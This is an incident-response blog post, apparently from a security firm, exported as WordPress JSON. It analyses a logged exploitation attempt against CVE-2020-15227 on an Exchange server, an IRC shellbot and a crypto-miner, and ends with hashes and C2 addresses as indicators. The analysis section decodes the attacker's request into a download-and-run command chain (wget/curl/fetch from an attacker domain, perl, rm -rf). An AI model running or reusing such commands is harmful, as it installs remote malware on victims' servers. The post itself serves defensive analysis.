{"id":14849,"date":"2021-06-15T10:05:46","date_gmt":"2021-06-15T08:05:46","guid":{"rendered":"https:\/\/www.secuinfra.com\/?p=14849"},"modified":"2022-04-01T09:27:30","modified_gmt":"2022-04-01T07:27:30","slug":"incident-response-diary","status":"publish","type":"post","link":"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/","title":{"rendered":"Incident Response Diary"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_83 counter-flat ez-toc-counter ez-toc-white ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">[inhalt_uebersetzt]<\/p>\n<span class=\"ez-toc-title-toggle\"><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/#Overview\" >Overview<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/#Identifying_IOCs\" >Identifying IOCs<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/testing.secuinfra.com\/en\/techtalk\/incident-response-diary\/#Conclusion\" >Conclusion<\/a><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"Overview\"><\/span>Overview<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>At the time of the deployment, large-scale exploitation of the vulnerabilities was still fairly new, which is why we used\u00a0<a  href=\"https:\/\/www.volexity.com\/blog\/2021\/03\/02\/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities\/\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >Volexity <\/a>blog post, among others, to identify IOCs. One possible IOC was the python-requests\/* user agent.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Identifying_IOCs\"><\/span>Identifying IOCs<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>During our analysis, in addition to the expected IOCs for the ProxyLogon\/Hafnium vulnerability, we were able to identify an IOC of another vulnerability. The following excerpt was taken from the httpproxy logs of the affected Exchange Server and indicates attempted exploitation of <a  href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-15227\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >CVE-2020-15227<\/a> . This is a vulnerability in the PHP framework &#8220;Nette&#8221;.<\/p>\n<blockquote>\n<pre><code class=\"language-python\">Python-urllib\/3.5,192.168.1.247,&lt;HOSTNAME&gt;,\u00a0url=https%3a%2f%2f&lt;IP-Address&gt;%2fo wa%2fnette.micro%23call- back%3\r\ndshell_exec%26cmd%3dcd%2b%2 52ftmp%253bwget%2band- mee.com%252f.x%252fb%253bcurl%2b- O%2bhttp%253a%252f%252f\r\nandmee.com%252f.x%252fb%253bfetch%2bht tp%253a%252f%252fand- mee.com%252f.x%252fb%253bperl%2bb %253brm%2b-rf%2bb*&amp;\r\nreason=0,,Begin- Request=2021-02-26T09:25:09.655Z; End-Request=2021-02-26T09:25:09.656Z;,,,<\/code><\/pre>\n<\/blockquote>\n<p>The vulnerability allows remote code execution under certain circumstances. The above call could be decoded into the following commands.<\/p>\n<ul>\n<li>https:\/\/&lt;IP-Address&gt;%\/owa\/<strong>nette.micro<\/strong>#callback=shell_exec&amp;cmd=cd \/tmp\u00a0wget\u00a0andmee[.]com\/.x\/b<\/li>\n<li>curl -O http:\/\/andmee[.]com\/.x\/b<\/li>\n<li>fetch http:\/\/andmee[.]com\/.x\/b<\/li>\n<li>perl\u00a0b rm -rf b<\/li>\n<\/ul>\n<p>The commands aim to download the Perl script b from the andmee[.]com domain, execute it and then delete the script.<\/p>\n<p>According to our research, the Perl script, in a modified form, was first <a  href=\"https:\/\/www.inforge.net\/forum\/threads\/stealth-shellbot-vers%D0%B3o-0-2-by-thiago-x.155975\/\"  dpc-external=\"true\"  target=\"_blank\"  rel=\"nofollow\" >published<\/a> in 2007. The communication between the zombie as well as the command and control (C2) server is done via an Internet Relay Chat (IRC).<br \/>\nThe botnet&#8217;s compromised systems have features such as DDoS, portscan and file download routines.<\/p>\n<p>Within the Perl script, the attacker only changed configurations. This includes, for example, the C2 IP address, the port used, and the IRC channel names. Based on our code analysis, we decided to run the script b within our malware lab and capture the network traffic. Below is a screenshot of the network traffic of file b.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone wp-image-14810\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-300x159.png\" alt=\"\" width=\"521\" height=\"276\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-300x159.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-1024x541.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-768x406.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-1536x812.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-24x13.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-36x19.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred-48x25.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_\u00b7_Follow_TCP_Stream__tcp_stream_eq_1__\u00b7_andmee_d_blurred.png 1918w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/p>\n<p>The screenshot above shows the initial connection to the IRC botnet. No further communication could be detected.<br \/>\nWe therefore decided to establish a manual connection via an IRC client.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-14827\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/IRC_xmr1_blurred-300x104.png\" alt=\"\" width=\"747\" height=\"259\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-300x104.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-1024x356.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-768x267.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-1536x534.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-2048x712.png 2048w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-24x8.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-36x13.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_xmr1_blurred-48x17.png 48w\" sizes=\"(max-width: 747px) 100vw, 747px\" \/><\/p>\n<p>At the time of our analysis, there were no other participants in the IRC chat except for the operator of the channel.<\/p>\n<p>In the next step of our analysis, we looked at the contents of the .x folder on the web server.<br \/>\nThe following screenshot shows a list of the files that were in the repository.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-14832\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/index_of_x_blurred-142x300.png\" alt=\"\" width=\"275\" height=\"581\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-142x300.png 142w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-484x1024.png 484w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-768x1624.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-726x1536.png 726w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-11x24.png 11w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-17x36.png 17w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred-23x48.png 23w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/index_of_x_blurred.png 511w\" sizes=\"(max-width: 275px) 100vw, 275px\" \/><\/p>\n<p>In addition to the b file, we looked at other files within the repository. This procedure included the subfolders \/.s as well as \/.p. Both subfolders contained similar files. These include the file crond, which, according to our research, is one of the crypto-miners (z0Miner).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14815\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/FALCON_DFIR_1_-300x60.png\" alt=\"\" width=\"555\" height=\"111\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-300x60.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-1024x205.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-768x154.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-24x5.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-36x7.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_-48x10.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/FALCON_DFIR_1_.png 1356w\" sizes=\"(max-width: 555px) 100vw, 555px\" \/><\/p>\n<p>In addition to the file b mentioned at the beginning, we analyzed the file bot.<br \/>\nThe execution of the Perl script bot within our malware analysis lab let us record the following network intercept:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14816\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/Wireshark_IRC-Communication_blurred-300x186.png\" alt=\"\" width=\"665\" height=\"412\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-300x186.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-1024x636.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-768x477.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-1536x954.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-24x15.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-36x22.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred-48x30.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/Wireshark_IRC-Communication_blurred.png 1932w\" sizes=\"(max-width: 665px) 100vw, 665px\" \/><\/p>\n<p>At the time of the analysis, no commands could be identified that were transmitted to the botnet via the IRC channel.<br \/>\nFor further analysis of the IRC server, we decided to manually connect to the IRC server again. After we were able to connect successfully, we were able to identify 22 active participants in the channel #cocina. #cocina is the channel on the IRC server that was specified in the script.<br \/>\nHowever, we could not determine whether the participants were infected systems waiting for commands or other IT security researchers.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-14817\" src=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/IRC_cocina_blurred-300x112.png\" alt=\"\" width=\"683\" height=\"255\" srcset=\"https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-300x112.png 300w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-1024x382.png 1024w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-768x287.png 768w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-1536x573.png 1536w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-24x9.png 24w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-36x13.png 36w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred-48x18.png 48w, https:\/\/testing.secuinfra.com\/wp-content\/uploads\/\/IRC_cocina_blurred.png 1816w\" sizes=\"(max-width: 683px) 100vw, 683px\" \/><\/p>\n<p>During our viewing time of the IRC channel, no further communication between us and the IRC channel could be detected. Likewise, no communication took place within the channel.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span><strong>Conclusion<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>As always, early as well as frequent patching applies to this scenario!<\/p>\n<p>As soon as a publicly available proof of concept for a vulnerability is available, the affected systems should be updated. If it is not possible to install the hotfixes promptly, the systems should be isolated to prevent possible damage.<br \/>\nIn our deployment, the CVE-2020-15227 vulnerability could not be exploited because the affected customer was not using the PHP framework.<\/p>\n<p><strong>MD5\u00a0h<\/strong><strong>ashes<\/strong><strong>\u00a0<\/strong><strong>\u00a0<\/strong><\/p>\n<ul>\n<li>\/.s\/crond\u00a0= 373b018bef17e04d8ff29472390403f9<\/li>\n<li>\/.p\/crond\u00a0= 9d099882a24757ac5033b0c675fecbe5<\/li>\n<li>bot\u00a0= 4f894225ec322479a73a4396689494ac<\/li>\n<li>b = 1cac8098cd20b6c9e9c82542946795b3<\/li>\n<\/ul>\n<p><strong>IP-Addresses\/Domains<\/strong><strong>\u00a0<\/strong><\/p>\n<ul>\n<li>5.39.217[.]212 (IRC Server\u00a0from\u00a0bot)<\/li>\n<li>198.98.61[.]106 (IRC Server\u00a0from\u00a0b)<\/li>\n<li>64.32.6[.]143 (IRC Server\u00a0from\u00a0nnx)<\/li>\n<li>pool.supportxmr[.]com:3333 (pool\u00a0url\u00a0from\u00a0.p\/confg.json)<\/li>\n<li>85.204.116[.]140:443 (pool\u00a0ip\u00a0from\u00a0.s\/config.json)<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>In addition to the expected IOCs for the ProxyLogon\/Hafnium vulnerability, our analysis identified one IOC of another vulnerability.<\/p>\n","protected":false},"author":6,"featured_media":27641,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[85,86,81],"tags":[],"dpc_coauthors":[],"class_list":["post-14849","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-digital-forensics","category-incident-response","category-techtalk"],"acf":[],"_links":{"self":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/14849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/comments?post=14849"}],"version-history":[{"count":0,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/posts\/14849\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/media\/27641"}],"wp:attachment":[{"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/media?parent=14849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/categories?post=14849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/tags?post=14849"},{"taxonomy":"dpc_coauthors","embeddable":true,"href":"https:\/\/testing.secuinfra.com\/en\/wp-json\/wp\/v2\/dpc_coauthors?post=14849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}